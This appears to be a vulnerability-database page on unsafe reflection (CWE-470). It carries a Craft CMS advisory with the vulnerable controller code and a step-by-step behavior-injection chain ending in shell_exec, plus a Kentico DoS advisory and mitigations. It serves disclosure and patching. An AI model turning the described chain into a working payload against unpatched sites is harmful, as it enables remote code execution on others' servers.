A Remote Code Execution (RCE) vulnerability exists in Craft CMS 5.x and 4.x that bypasses the security fixes for GHSA-7jx7-3846-m7w7 and GHSA-255j-qw47-wjh5. This vulnerability can be exploited by any authenticated user with control panel access.
The existing patches add cleanseConfig() to assembleLayoutFromPost() and various FieldsController actions to strip Yii2 behavior/event injection keys (as and on prefixed keys). However, the fieldLayouts parameter in ElementIndexesController::actionFilterHud() is passed directly to FieldLayout::createFromConfig() without any sanitization, enabling the same behavior injection attack chain.
Impact
- Attack Type: Remote Code Execution (RCE)
- Authentication Required: Authenticated user with control panel access (
accessCppermission)
Vulnerability Details
Root Cause
In ElementIndexesController::actionFilterHud() (line 493-494), the fieldLayouts body parameter is passed to FieldLayout::createFromConfig() without cleanseConfig():
// ElementIndexesController.php:485-494
if ($conditionConfig) {
$conditionConfig = Component::cleanseConfig($conditionConfig); // conditionConfig IS cleansed
$condition = $conditionsService->createCondition($conditionConfig);
} else {
$condition = $this->elementType()::createCondition();
}
if (!empty($fieldLayouts)) {
// fieldLayouts is NOT cleansed!
$condition->setFieldLayouts(array_map(
fn(array $config) => FieldLayout::createFromConfig($config),
$fieldLayouts
));
}
Note the inconsistency: conditionConfig is sanitized with cleanseConfig(), but fieldLayouts is not.
Attack Chain
- Send a
fieldLayoutsarray containing config with"as <name>"prefixed keys FieldLayout::createFromConfig($config)->new self($config)->Model::__construct($config)App::configure($this, $config)processes each key"as rce"key ->Component::__set("as rce", $value)->Yii::createObject($value)-> instantiatesAttributeTypecastBehaviorand attaches it to the FieldLayout"on *"key -> registers a wildcard event handlerparent::__construct()->init()->setTabs([])->getAvailableNativeFields()->trigger(EVENT_DEFINE_NATIVE_FIELDS)- The wildcard handler fires ->
AttributeTypecastBehavior::beforeSave()->typecastAttributes() $this->owner->typecastBeforeSave-> resolved viaComponent::__get()-> returns the command string from the behavior's own propertycall_user_func([ConsoleProcessus::class, 'execute'], $command)->shell_exec($command)
Prerequisites
- A user account with control panel access
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 5.9.12"
},
"package": {
"ecosystem": "Packagist",
"name": "craftcms/cms"
},
"ranges": [
{
"events": [
{
"introduced": "5.6.0"
},
{
"fixed": "5.9.13"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33157"
],
"database_specific": {
"cwe_ids": [
"CWE-470"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-24T16:50:42Z",
"nvd_published_at": "2026-03-24T18:16:09Z",
"severity": "HIGH"
},
"details": "## Summary\n\nA Remote Code Execution (RCE) vulnerability exists in Craft CMS 5.x and 4.x that bypasses the security fixes for GHSA-7jx7-3846-m7w7 and GHSA-255j-qw47-wjh5. This vulnerability can be exploited by any authenticated user with control panel access.\n\nThe existing patches add `cleanseConfig()` to `assembleLayoutFromPost()` and various `FieldsController` actions to strip Yii2 behavior/event injection keys (`as ` and `on ` prefixed keys). However, the `fieldLayouts` parameter in `ElementIndexesController::actionFilterHud()` is passed directly to `FieldLayout::createFromConfig()` without any sanitization, enabling the same behavior injection attack chain.\n\n## Impact\n\n- **Attack Type**: Remote Code Execution (RCE)\n- **Authentication Required**: Authenticated user with control panel access (`accessCp` permission)\n\n## Vulnerability Details\n\n### Root Cause\n\nIn `ElementIndexesController::actionFilterHud()` (line 493-494), the `fieldLayouts` body parameter is passed to `FieldLayout::createFromConfig()` without `cleanseConfig()`:\n\n```php\n// ElementIndexesController.php:485-494\nif ($conditionConfig) {\n $conditionConfig = Component::cleanseConfig($conditionConfig); // conditionConfig IS cleansed\n $condition = $conditionsService-\u003ecreateCondition($conditionConfig);\n} else {\n $condition = $this-\u003eelementType()::createCondition();\n}\n\nif (!empty($fieldLayouts)) {\n // fieldLayouts is NOT cleansed!\n $condition-\u003esetFieldLayouts(array_map(\n fn(array $config) =\u003e FieldLayout::createFromConfig($config),\n $fieldLayouts\n ));\n}\n```\n\nNote the inconsistency: `conditionConfig` is sanitized with `cleanseConfig()`, but `fieldLayouts` is not.\n\n### Attack Chain\n\n1. Send a `fieldLayouts` array containing config with `\"as \u003cname\u003e\"` prefixed keys\n2. `FieldLayout::createFromConfig($config)` -\u003e `new self($config)` -\u003e `Model::__construct($config)`\n3. `App::configure($this, $config)` processes each key\n4. `\"as rce\"` key -\u003e `Component::__set(\"as rce\", $value)` -\u003e `Yii::createObject($value)` -\u003e instantiates `AttributeTypecastBehavior` and attaches it to the FieldLayout\n5. `\"on *\"` key -\u003e registers a wildcard event handler\n6. `parent::__construct()` -\u003e `init()` -\u003e `setTabs([])` -\u003e `getAvailableNativeFields()` -\u003e `trigger(EVENT_DEFINE_NATIVE_FIELDS)`\n7. The wildcard handler fires -\u003e `AttributeTypecastBehavior::beforeSave()` -\u003e `typecastAttributes()`\n8. `$this-\u003eowner-\u003etypecastBeforeSave` -\u003e resolved via `Component::__get()` -\u003e returns the command string from the behavior\u0027s own property\n9. `call_user_func([ConsoleProcessus::class, \u0027execute\u0027], $command)` -\u003e `shell_exec($command)`\n\n### Prerequisites\n\n- A user account with control panel access",
"id": "GHSA-2fph-6v5w-89hh",
"modified": "2026-03-25T20:59:38Z",
"published": "2026-03-24T16:50:42Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/craftcms/cms/security/advisories/GHSA-2fph-6v5w-89hh"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33157"
},
{
"type": "WEB",
"url": "https://github.com/craftcms/cms/commit/97e90b4bdee369c1af3ca77a77531132df240e4e"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-255j-qw47-wjh5"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-7jx7-3846-m7w7"
},
{
"type": "PACKAGE",
"url": "https://github.com/craftcms/cms"
},
{
"type": "WEB",
"url": "https://github.com/craftcms/cms/releases/tag/5.9.13"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Craft CMS is Vulnerable to Authenticated Remote Code Execution via Malicious Attached Behavior"
}
GHSA-2M69-F932-GV3G
Vulnerability from github – Published: 2025-03-31 18:31 – Updated: 2025-11-05 00:31An unsafe reflection vulnerability in Kentico Xperience allows an unauthenticated attacker to kill the current process, leading to a Denial-of-Service condition.
This issue affects Xperience: through 13.0.180.
{
"affected": [],
"aliases": [
"CVE-2025-2794"
],
"database_specific": {
"cwe_ids": [
"CWE-470"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-03-31T17:15:41Z",
"severity": "HIGH"
},
"details": "An unsafe reflection vulnerability in Kentico Xperience allows an unauthenticated attacker to kill the current process, leading to a Denial-of-Service condition.\n\n\n\n\nThis issue affects Xperience: through 13.0.180.",
"id": "GHSA-2m69-f932-gv3g",
"modified": "2025-11-05T00:31:17Z",
"published": "2025-03-31T18:31:07Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-2794"
},
{
"type": "WEB",
"url": "https://devnet.kentico.com/download/hotfixes"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/kentico-xperience-unsafe-reflection"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
Mitigation
Refactor your code to avoid using reflection.
Mitigation
Do not use user-controlled inputs to select and load classes or code.
Mitigation
Apply strict input validation by using allowlists or indirect selection to ensure that the user is only selecting allowable classes or code.
CAPEC-138: Reflection Injection
An adversary supplies a value to the target application which is then used by reflection methods to identify a class, method, or field. For example, in the Java programming language the reflection libraries permit an application to inspect, load, and invoke classes and their components by name. If an adversary can control the input into these methods including the name of the class/method/field or the parameters passed to methods, they can cause the targeted application to invoke incorrect methods, read random fields, or even to load and utilize malicious classes that the adversary created. This can lead to the application revealing sensitive information, returning incorrect results, or even having the adversary take control of the targeted application.